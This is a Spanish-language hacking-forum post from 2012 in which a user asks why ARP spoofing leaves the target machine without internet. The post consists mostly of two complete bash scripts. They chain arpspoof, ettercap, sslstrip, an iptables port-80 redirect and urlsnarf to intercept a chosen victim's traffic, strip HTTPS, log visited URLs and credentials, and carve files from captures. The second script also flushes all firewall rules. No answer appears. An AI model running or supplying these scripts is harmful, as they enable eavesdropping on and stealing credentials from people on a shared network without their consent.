elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ARPSPOOF me deja sin conexion a internet
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ARPSPOOF me deja sin conexion a internet  (Leído 2,740 veces)
luza

Desconectado Desconectado

Mensajes: 1


Ver Perfil
ARPSPOOF me deja sin conexion a internet
« en: 18 Diciembre 2012, 05:42 am »

Hola, Me sucede el siguiente problema aver si alguno me puede ayudar cuando ejecuto el siguiente script que hice recopilando cosas que lei :
Código:
#!/bin/bash


INTERFAZ_DE_RED=$(ifconfig | grep eth | awk '{print $1}')
IP_VICTIMA=$1
IP_ROUTER=$2

#es un archivo que hice para descomentar el etter.conf original
cat etter.conf > /etc/etter.conf

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip -a -k -f &


gnome-terminal -e "arpspoof -i $INTERFAZ_DE_RED -t $IP_VICTIMA $IP_ROUTER" &


gnome-terminal -e "ettercap -T -q -i $INTERFAZ_DE_RED"



si lo hago desde una maquina virtual a mi maquina original o a otra virtual funciona perfectamente logro el ARPSPOOF pero si lo realizo a una maquina que esta en la red la dejo sin internet y no se por que pasa eso si en mi maquina funciona se supone que aunque sea una maquina virtual es lo mismo.


probe con este script que encontre
Código:
#!/bin/bash

echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM

mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
pero me sucede lo mismo no se como solucionarlo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema Con Arpspoof
GNU/Linux
Fayre 0 3,474 Último mensaje 4 Agosto 2010, 18:37 pm
por Fayre
Comportamiento extraño Cache ARP (Arpspoof)
Hacking Wireless
thurgrim 0 2,571 Último mensaje 17 Junio 2011, 22:49 pm
por thurgrim
sslstrip & arpspoof (cerrar conexión) « 1 2 3 »
Hacking
rigg 20 16,551 Último mensaje 4 Enero 2012, 04:44 am
por thedevilini
parar arpspoof
Hacking
soyloqbuskas 6 5,054 Último mensaje 16 Agosto 2012, 05:41 am
por soyloqbuskas
problemas con arpspoof
Hacking
aixeiger 0 2,260 Último mensaje 20 Noviembre 2012, 20:01 pm
por aixeiger
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines